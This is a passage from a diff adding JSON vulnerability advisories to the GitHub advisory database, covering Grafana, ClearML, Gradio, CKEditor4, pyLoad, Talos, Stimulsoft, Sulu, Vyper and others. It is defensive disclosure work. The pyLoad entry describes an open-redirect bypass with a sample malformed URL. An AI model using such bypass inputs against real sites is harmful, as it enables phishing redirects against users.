team](https://github.com/rancher/rancher/security/policy) for security-related inquiries.\n- Open an issue in the [Rancher](https://github.com/rancher/rancher/issues/new/choose) repository.\n- Verify with our [support matrix](https://www.suse.com/suse-rancher/support-matrix/all-supported-versions/) and [product support lifecycle](https://www.suse.com/lifecycle/).\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/rancher/rancher" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.6.0" + }, + { + "fixed": "2.6.14" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/rancher/rancher" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.7.0" + }, + { + "fixed": "2.7.10" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/rancher/rancher" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.8.0" + }, + { + "fixed": "2.8.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/rancher/rancher/security/advisories/GHSA-c85r-fwc7-45vc" + }, + { + "type": "PACKAGE", + "url": "https://github.com/rancher/rancher" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-269" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-02-08T18:43:28Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-cmf4-h3xc-jw8w/GHSA-cmf4-h3xc-jw8w.json b/advisories/github-reviewed/2024/02/GHSA-cmf4-h3xc-jw8w/GHSA-cmf4-h3xc-jw8w.json new file mode 100644 index 0000000000000..7a8cb281fc904 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-cmf4-h3xc-jw8w/GHSA-cmf4-h3xc-jw8w.json @@ -0,0 +1,100 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cmf4-h3xc-jw8w", + "modified": "2024-02-01T00:16:02Z", + "published": "2024-02-01T00:16:02Z", + "aliases": [ + "CVE-2022-21703" + ], + "summary": "Grafana Cross Site Request Forgery (CSRF)", + "details": "Today we are releasing Grafana 8.3.5 and 7.5.15. This patch release includes MEDIUM severity security fix for Cross Site Request Forgery for Grafana.\n\nRelease v.8.3.5, only containing security fixes:\n\n- [Download Grafana 8.3.5](https://grafana.com/grafana/download/8.3.5)\n- [Release notes](https://grafana.com/docs/grafana/latest/release-notes/release-notes-8-3-5/)\n\nRelease v.7.5.15, only containing security fixes:\n\n- [Download Grafana 7.5.15](https://grafana.com/grafana/download/7.5.15)\n- [Release notes](https://grafana.com/docs/grafana/latest/release-notes/release-notes-7-5-15/)\n\n## CSRF ([CVE-2022-21703](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21703))\n\n### Summary\nOn Jan. 18, security researchers [jub0bs](https://twitter.com/jub0bs) and [abrahack](https://twitter.com/theabrahack) contacted Grafana to disclose a CSRF vulnerability which allows anonymous attackers to elevate their privileges by mounting cross-origin attacks against authenticated high-privilege Grafana users (for example, Editors or Admins). \n\nWe believe that this vulnerability is rated at CVSS 6.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:N). \n\n### Impact\nAn attacker can exploit this vulnerability for privilege escalation by tricking an authenticated user into inviting the attacker as a new user with high privileges. \n\n### Affected versions with MEDIUM severity \nAll Grafana >=3.0-beta1 versions are affected by this vulnerability.\n\n### Solutions and mitigations\n\nAll installations after Grafana v3.0-beta1 should be upgraded as soon as possible.\n\nNote that if you are running Grafana behind any reverse proxy, you need to make sure that you are passing the original Host and Origin headers from the client request to Grafana.\n\nIn the case of Apache Server, you need to add `ProxyPreserveHost on` in your proxy [configuration](https://httpd.apache.org/docs/2.4/mod/mod_proxy.html). In case of NGINX, you can need to add `proxy_set_header Host $http_host;` in your [configuration](http://nginx.org/en/docs/http/ngx_http_proxy_module.html).\n\nAppropriate patches have been applied to [Grafana Cloud](https://grafana.com/cloud) and as always, we closely coordinated with all cloud providers licensed to offer Grafana Pro. They have received early notification under embargo and confirmed that their offerings are secure at the time of this announcement. This is applicable to Amazon Managed Grafana.\n\n### Timeline and postmortem\n\nHere is a detailed timeline starting from when we originally learned of the issue. All times in UTC.\n- 2022-01-18 03:00 Issue submitted by external researchers\n- 2022-01-18 17:25 Vulnerability confirmed reproducible \n- 2022-01-19 07:40 CVSS score confirmed 6.8 at maximum and MEDIUM impact\n- 2022-01-19 07:40 Begin mitigation for Grafana Cloud\n- 2022-01-19 17:00 CVE requested \n- 2022-01-19 19:50 GitHub issues CVE-2022-21703\n- 2022-01-21 10:50 PR with fix opened\n- 2022-01-21 14:13 Private release planned for 2022-01-25, and public release planned for 2022-02-01.\n- 2022-01-25 12:00 Private release\n- 2022-02-01 12:00 During the public release process, we realized that private 7.x release was incomplete. Abort public release, send second private release to customers using 7.x\n- 2022-02-08 12:00 Public release\n\n### Acknowledgement\n\nWe would like to thank [jub0bs](https://twitter.com/jub0bs) and [abrahack](https://twitter.com/theabrahack) for responsibly disclosing the vulnerability.\n\n### Reporting security issues\n\nIf you think you have found a security vulnerability, please send a report to security@grafana.com. This address can be used for all of Grafana Labs' open source and commercial products (including, but not limited to Grafana, Grafana Cloud, Grafana Enterprise, and grafana.com). We can accept only vulnerability reports at this address. We would prefer that you encrypt your message to us by using our PGP key. The key fingerprint is\n\nF988 7BEA 027A 049F AE8E 5CAA D125 8932 BE24 C5CA\n\nThe key is available from keyserver.ubuntu.com.\n\n### Security announcements\n\nWe maintain a [security category](https://community.grafana.com/c/support/security-announcements) on our blog, where we will always post a summary, remediation, and mitigation details for any patch containing security fixes.\n\nYou can also subscribe to our [RSS feed](https://grafana.com/tags/security/index.xml).\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/grafana/grafana/pkg/web" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.0-beta1" + }, + { + "fixed": "7.5.15" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/grafana/grafana/pkg/web" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "8.0.0" + }, + { + "fixed": "8.3.5" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/grafana/grafana/security/advisories/GHSA-cmf4-h3xc-jw8w" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-21703" + }, + { + "type": "WEB", + "url": "https://github.com/grafana/grafana/pull/45083" + }, + { + "type": "WEB", + "url": "https://grafana.com/blog/2022/02/08/grafana-7.5.15-and-8.3.5-released-with-moderate-severity-security-fixes/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2PFW6Q2LXXWTFRTMTRN4ZGADFRQPKJ3D/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/36GUEPA5TPSC57DZTPYPBL6T7UPQ2FRH/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HLAQRRGNSO5MYCPAXGPH2OCSHOGHSQMQ/" + }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20220303-0005/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-01T00:16:02Z", + "nvd_published_at": "2022-02-08T21:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-cpcw-9h9m-wqw9/GHSA-cpcw-9h9m-wqw9.json b/advisories/github-reviewed/2024/02/GHSA-cpcw-9h9m-wqw9/GHSA-cpcw-9h9m-wqw9.json new file mode 100644 index 0000000000000..9b3508163a54a --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-cpcw-9h9m-wqw9/GHSA-cpcw-9h9m-wqw9.json @@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cpcw-9h9m-wqw9", + "modified": "2024-02-06T20:28:52Z", + "published": "2024-02-06T15:32:06Z", + "aliases": [ + "CVE-2024-24590" + ], + "summary": "Allegro AI ClearML vulnerable to deserialization of untrusted data", + "details": "Deserialization of untrusted data can occur in version 0.17.0 or newer of Allegro AI’s ClearML platform, enabling a maliciously uploaded artifact to run arbitrary code on an end user’s system when interacted with.\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "clearml" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.17.0" + }, + { + "last_affected": "1.14.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24590" + }, + { + "type": "PACKAGE", + "url": "https://github.com/allegroai/clearml" + }, + { + "type": "WEB", + "url": "https://hiddenlayer.com/research/not-so-clear-how-mlops-solutions-can-muddy-the-waters-of-your-supply-chain/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-02-06T20:28:52Z", + "nvd_published_at": "2024-02-06T15:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-f3h9-8phc-6gvh/GHSA-f3h9-8phc-6gvh.json b/advisories/github-reviewed/2024/02/GHSA-f3h9-8phc-6gvh/GHSA-f3h9-8phc-6gvh.json new file mode 100644 index 0000000000000..3620a66eef1c6 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-f3h9-8phc-6gvh/GHSA-f3h9-8phc-6gvh.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f3h9-8phc-6gvh", + "modified": "2024-02-06T20:25:41Z", + "published": "2024-02-06T00:30:28Z", + "aliases": [ + "CVE-2024-0964" + ], + "summary": "Gradio Path Traversal vulnerability", + "details": "A local file include could be remotely triggered in Gradio due to a vulnerable user-supplied JSON value in an API request.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "gradio" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.9.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0964" + }, + { + "type": "WEB", + "url": "https://github.com/gradio-app/gradio/commit/d76bcaaaf0734aaf49a680f94ea9d4d22a602e70" + }, + { + "type": "PACKAGE", + "url": "https://github.com/gradio-app/gradio" + }, + { + "type": "WEB", + "url": "https://huntr.com/bounties/25e25501-5918-429c-8541-88832dfd3741" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-02-06T20:25:41Z", + "nvd_published_at": "2024-02-05T23:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-f56g-chqp-22m9/GHSA-f56g-chqp-22m9.json b/advisories/github-reviewed/2024/02/GHSA-f56g-chqp-22m9/GHSA-f56g-chqp-22m9.json new file mode 100644 index 0000000000000..c00bad4ec564b --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-f56g-chqp-22m9/GHSA-f56g-chqp-22m9.json @@ -0,0 +1,58 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f56g-chqp-22m9", + "modified": "2024-02-03T00:28:45Z", + "published": "2024-02-03T00:28:45Z", + "aliases": [ + + ], + "summary": "Use after free in libpulse-binding", + "details": "### Overview\n\nVersion 2.5.0 of the `libpulse-binding` Rust crate, released on the 22nd of December 2018, fixed a potential use-after-free issue with property list iteration due to a lack of a lifetime constraint tying the lifetime of a `proplist::Iterator` to the `Proplist` object for which it was created. This made it possible for users, without experiencing a compiler error/warning, to destroy the `Proplist` object before the iterator, thus destroying the underlying C object the iterator works upon, before the iterator may be finished with it.\n\nThis advisory is being written retrospectively, having previously only been noted in the changelog. No CVE assignment was sought.\n\nThis impacts all versions of the crate before 2.5.0 back to 1.0.5. Before version 1.0.5 the function that produces the iterator was broken to the point of being useless.\n\n### Patches\n\nUsers are required to update to version 2.5.0 or newer.\n\nVersions older than 2.5.0 have been yanked from crates.io as of the 22nd of October 2020.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "crates.io", + "name": "libpulse-binding" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.0.5" + }, + { + "fixed": "2.5.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/jnqnfe/pulse-binding-rust/security/advisories/GHSA-f56g-chqp-22m9" + }, + { + "type": "WEB", + "url": "https://github.com/jnqnfe/pulse-binding-rust/commit/9e31c82d71749619387cb9d0c9698134d05b28c9" + }, + { + "type": "WEB", + "url": "https://rustsec.org/advisories/RUSTSEC-2018-0020.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-416" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-02-03T00:28:45Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-fq6h-4g8v-qqvm/GHSA-fq6h-4g8v-qqvm.json b/advisories/github-reviewed/2024/02/GHSA-fq6h-4g8v-qqvm/GHSA-fq6h-4g8v-qqvm.json new file mode 100644 index 0000000000000..b3c74bbdfbc3d --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-fq6h-4g8v-qqvm/GHSA-fq6h-4g8v-qqvm.json @@ -0,0 +1,77 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fq6h-4g8v-qqvm", + "modified": "2024-02-07T20:23:50Z", + "published": "2024-02-07T17:30:37Z", + "aliases": [ + "CVE-2024-24815" + ], + "summary": "CKEditor4 Cross-site Scripting vulnerability caused by incorrect CDATA detection", + "details": "### Affected packages\nThe vulnerability has been discovered in the core HTML parsing module and may affect all editor instances that:\n* Enabled [full-page editing](https://ckeditor.com/docs/ckeditor4/latest/features/fullpage.html) mode,\n* or enabled [CDATA](https://ckeditor.com/docs/ckeditor4/latest/api/CKEDITOR_dtd.html#property-S-cdata) elements in [Advanced Content Filtering](https://ckeditor.com/docs/ckeditor4/latest/guide/dev_advanced_content_filter.html) configuration (defaults to `script` and `style` elements).\n\n### Impact\n\nA potential vulnerability has been discovered in CKEditor 4 HTML processing core module. The vulnerability allowed to inject malformed HTML content bypassing Advanced Content Filtering mechanism, which could result in executing JavaScript code. An attacker could abuse faulty CDATA content detection and use it to prepare an intentional attack on the editor. It affects all users using the CKEditor 4 at version < 4.24.0-lts.\n\n### Patches\nThe problem has been recognized and patched. The fix will be available in version 4.24.0-lts.\n\n### For more information\nEmail us at [security@cksource.com](mailto:security@cksource.com) if you have any questions or comments about this advisory.\n\n### Acknowledgements\nThe CKEditor 4 team would like to thank [Michal Frýba](https://cz.linkedin.com/in/michal-fryba) from [ALEF NULA](https://www.alefnula.com/) for recognizing and reporting this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "ckeditor4" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.24.0-lts" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-fq6h-4g8v-qqvm" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24815" + }, + { + "type": "WEB", + "url": "https://github.com/ckeditor/ckeditor4/commit/8ed1a3c93d0ae5f49f4ecff5738ab8a2972194cb" + }, + { + "type": "WEB", + "url": "https://ckeditor.com/docs/ckeditor4/latest/api/CKEDITOR_dtd.html#property-S-cdata" + }, + { + "type": "WEB", + "url": "https://ckeditor.com/docs/ckeditor4/latest/features/fullpage.html" + }, + { + "type": "WEB", + "url": "https://ckeditor.com/docs/ckeditor4/latest/guide/dev_advanced_content_filter.html" + }, + { + "type": "PACKAGE", + "url": "https://github.com/ckeditor/ckeditor4" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-07T17:30:37Z", + "nvd_published_at": "2024-02-07T16:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-g3cm-qg2v-2hj5/GHSA-g3cm-qg2v-2hj5.json b/advisories/github-reviewed/2024/02/GHSA-g3cm-qg2v-2hj5/GHSA-g3cm-qg2v-2hj5.json new file mode 100644 index 0000000000000..438f705c2fc7c --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-g3cm-qg2v-2hj5/GHSA-g3cm-qg2v-2hj5.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g3cm-qg2v-2hj5", + "modified": "2024-02-08T16:34:20Z", + "published": "2024-02-05T23:23:22Z", + "aliases": [ + "CVE-2024-24808" + ], + "summary": "pyLoad open redirect vulnerability due to improper validation of the is_safe_url function", + "details": "### Summary\nOpen redirect vulnerability due to incorrect validation of input values when redirecting users after login.\n\n### Details\npyload is validating URLs via the `get_redirect_url` function when redirecting users at login.\n![301715649-f533db41-d0bd-44f7-8735-be1887fbd06c](https://github.com/pyload/pyload/assets/114328108/7fbec2ed-05ed-46e6-847f-05132cf3f136)\n\n\nThe URL entered in the `next` variable goes through the `is_safe_url` function, where a lack of validation can redirect the user to an arbitrary domain.\n![301715667-2819b1d3-8a14-42f4-89c8-3d2fa84fc309](https://github.com/pyload/pyload/assets/114328108/613484f3-8097-4871-887d-8fa5eec817cc)\n\n\nThe documentation in the urllib library shows that improper URLs are recognized as relative paths when using the `urlparse` function. (https://docs.python.org/3/library/urllib.parse.html#urllib.parse.urlparse)\n\nFor example, When an unusual URL like `https:///example.com` is entered, `urlparse` interprets it as a relative path, but in the actual request it is converted to `https://example.com` due to url normalization.\n\n### PoC\n1. In the next variable, insert the URL to which you want to redirect the user.\n![301715949-bb1451eb-5e84-451d-83b4-5c3e204d1df7](https://github.com/pyload/pyload/assets/114328108/6fe639ea-1f85-4715-bf6c-c9c8c4ee9c94)\n\n\n\n2. Check that it is possible to bypass url validation and redirect users to an arbitrary url.\n![301715824-3de6584a-878d-4ec4-a3d5-a34d11c6c0ac](https://github.com/pyload/pyload/assets/114328108/902b3244-a4ef-4f8e-8319-c4b92764f15f)\n![301716107-ba5ab7b9-7aa8-4b7a-8924-eba82442b4c3](https://github.com/pyload/pyload/assets/114328108/35191d7b-50b9-4a46-8319-ebdebec20b41)\n\n\n\n### Impact\nAn attacker can use this vulnerability to redirect users to malicious websites, which can be used for phishing and similar attacks.\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "pyload-ng" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.5.0b3.dev79" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/pyload/pyload/security/advisories/GHSA-g3cm-qg2v-2hj5" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24808" + }, + { + "type": "WEB", + "url": "https://github.com/pyload/pyload/commit/fe94451dcc2be90b3889e2fd9d07b483c8a6dccd" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pyload/pyload" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-601" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-05T23:23:22Z", + "nvd_published_at": "2024-02-06T04:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-g5p6-327m-3fxx/GHSA-g5p6-327m-3fxx.json b/advisories/github-reviewed/2024/02/GHSA-g5p6-327m-3fxx/GHSA-g5p6-327m-3fxx.json new file mode 100644 index 0000000000000..2367fcac56f91 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-g5p6-327m-3fxx/GHSA-g5p6-327m-3fxx.json @@ -0,0 +1,76 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g5p6-327m-3fxx", + "modified": "2024-02-02T18:11:06Z", + "published": "2024-02-02T18:11:06Z", + "aliases": [ + + ], + "summary": "Talos Linux ships runc vulnerable to the escape to the host attack", + "details": "### Impact\n\nSnyk has discovered a vulnerability in all versions of runc <=1.1.11, as used by the Docker engine, along with other containerization technologies such as Kubernetes. Exploitation of this issue can result in container escape to the underlying host OS, either through executing a malicious image or building an image using a malicious Dockerfile or upstream image (i.e., when using FROM). This issue has been assigned the CVE-2024-21626.\n\n### Patches\n\n`runc` runtime was updated to 1.1.12 in Talos v1.5.6 and v1.6.4.\n\n### Workarounds\n\nInspect the workloads running on the cluster to make sure they are not trying to exploit the vulnerability.\n\n### References\n\n* [CVE-2024-21626](https://github.com/opencontainers/runc/security/advisories/GHSA-xr7r-f8xq-vfvv)\n* [Vulnerability: runc process.cwd and leaked fds container breakout](https://snyk.io/blog/cve-2024-21626-runc-process-cwd-container-breakout/)\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/siderolabs/talos" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.6.0" + }, + { + "fixed": "1.6.4" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/siderolabs/talos" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.5.6" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/siderolabs/talos/security/advisories/GHSA-g5p6-327m-3fxx" + }, + { + "type": "PACKAGE", + "url": "https://github.com/siderolabs/talos" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-02-02T18:11:06Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-gfqf-9w98-7jmx/GHSA-gfqf-9w98-7jmx.json b/advisories/github-reviewed/2024/02/GHSA-gfqf-9w98-7jmx/GHSA-gfqf-9w98-7jmx.json new file mode 100644 index 0000000000000..f3823f6af51f4 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-gfqf-9w98-7jmx/GHSA-gfqf-9w98-7jmx.json @@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gfqf-9w98-7jmx", + "modified": "2024-02-06T18:23:19Z", + "published": "2024-02-06T00:30:28Z", + "aliases": [ + "CVE-2024-24398" + ], + "summary": "Stimulsoft Dashboard.JS directory traversal vulnerability", + "details": "Directory Traversal vulnerability in Stimulsoft GmbH Stimulsoft Dashboard.JS before v.2024.1.3 allows a remote attacker to execute arbitrary code via a crafted payload to the fileName parameter of the Save function.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "stimulsoft-dashboards-js" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2024.1.3" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24398" + }, + { + "type": "WEB", + "url": "https://cloud-trustit.spp.at/s/Pi78FFazHamJQ5R" + }, + { + "type": "WEB", + "url": "https://cves.at/posts/cve-2024-24398/writeup/" + }, + { + "type": "PACKAGE", + "url": "https://github.com/stimulsoft/Dashboards.JS" + }, + { + "type": "WEB", + "url": "http://stimulsoft.com" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "CRITICAL", + "github_reviewed": true, + "github_reviewed_at": "2024-02-06T18:23:19Z", + "nvd_published_at": "2024-02-06T00:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-gfrh-gwqc-63cv/GHSA-gfrh-gwqc-63cv.json b/advisories/github-reviewed/2024/02/GHSA-gfrh-gwqc-63cv/GHSA-gfrh-gwqc-63cv.json new file mode 100644 index 0000000000000..d2835e19514d0 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-gfrh-gwqc-63cv/GHSA-gfrh-gwqc-63cv.json @@ -0,0 +1,78 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gfrh-gwqc-63cv", + "modified": "2024-02-05T20:24:18Z", + "published": "2024-02-05T20:24:18Z", + "aliases": [ + "CVE-2024-24807" + ], + "summary": "Sulu HTML Injection via Autocomplete Suggestion", + "details": "### Impact\n\nIt is an issue when input HTML into the Tag name. The HTML is execute when the tag name is listed in the auto complete form.\nOnly admin users are affected and only admin users can create tags.\n\n### Patches\n\n_Has the problem been patched? What versions should users upgrade to?_\n\nThe problem is patched with Version 2.4.16 and 2.5.12.\n\n### Workarounds\n_Is there a way for users to fix or remediate the vulnerability without upgrading?_\n\nCreate a custom mutation observer\n\n### References\n_Are there any links users can visit to find out more?_\n\nCurrently not.\n\n### For more information\n\n_If you have any questions or comments about this advisory:_\n\n - Open an issue in [sulu/sulu repository](https://github.com/sulu/sulu/issues)\n - Email us at [security@sulu.io](mailto:security@sulu.io)\n", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "sulu/sulu" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.0.0" + }, + { + "fixed": "2.4.16" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "sulu/sulu" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.5.0" + }, + { + "fixed": "2.5.12" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/sulu/sulu/security/advisories/GHSA-gfrh-gwqc-63cv" + }, + { + "type": "WEB", + "url": "https://github.com/sulu/sulu/commit/570c78124ae97cb02469141b86ac69d9fb2cb147" + }, + { + "type": "PACKAGE", + "url": "https://github.com/sulu/sulu" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79", + "CWE-80" + ], + "severity": "LOW", + "github_reviewed": true, + "github_reviewed_at": "2024-02-05T20:24:18Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-gp3w-2v2m-p686/GHSA-gp3w-2v2m-p686.json b/advisories/github-reviewed/2024/02/GHSA-gp3w-2v2m-p686/GHSA-gp3w-2v2m-p686.json new file mode 100644 index 0000000000000..d257bcb5384f4 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-gp3w-2v2m-p686/GHSA-gp3w-2v2m-p686.json @@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gp3w-2v2m-p686", + "modified": "2024-02-02T18:44:51Z", + "published": "2024-02-02T18:10:10Z", + "aliases": [ + "CVE-2024-24560" + ], + "summary": "Vyper's external calls can overflow return data to return input buffer", + "details": "## Summary\n\nWhen calls to external contracts are made, we write the input buffer starting at byte 28, and allocate the return buffer to start at byte 0 (overlapping with the input buffer). When checking `RETURNDATASIZE` for dynamic types, the size is compared only to the minimum allowed size for that type, and not to the returned value's `length`. As a result, malformed return data can cause the contract to mistake data from the input buffer for returndata.\n\nThis advisory is given a severity of \"Low\" because when the called contract returns invalid ABIv2 encoded data, the calling contract can read different invalid data (from the dirty buffer) than the called contract returned.\n\n## Details\n\nWhen arguments are packed for an external call, we create a buffer of size `max(args, return_data) + 32`. The input buffer is placed in this buffer (starting at byte 28), and the return buffer is allocated to start at byte 0. The assumption is that we can reuse the memory becase we will not be able to read past `RETURNDATASIZE`.\n\n```python\nif fn_type.return_type is not None:\n return_abi_t = calculate_type_for_external_return(fn_type.return_type).abi_type\n\n # we use the same buffer for args and returndata,\n # so allocate enough space here for the returndata too.\n buflen = max(args_abi_t.size_bound(), return_abi_t.size_bound())\nelse:\n buflen = args_abi_t.size_bound()\n\nbuflen += 32 # padding for the method id\n```\n\nWhen data is returned, we unpack the return data by starting at byte 0. We check that `RETURNDATASIZE` is greater than the minimum allowed for the returned type:\n```python\nif not call_kwargs.skip_contract_check:\n assertion = IRnode.from_list(\n [\"assert\", [\"ge\", \"returndatasize\", min_return_size]],\n error_msg=\"returndatasize too small\",\n )\n unpacker.append(assertion)\n```\n\nThis check ensures that any dynamic types returned will have a size of at least 64. However, it does not verify that `RETURNDATASIZE` is as large as the `length` word of the dynamic type. \n\nAs a result, if a contract expects a dynamic type to be returned, and the part of the return data that is read as `length` includes a size that is larger 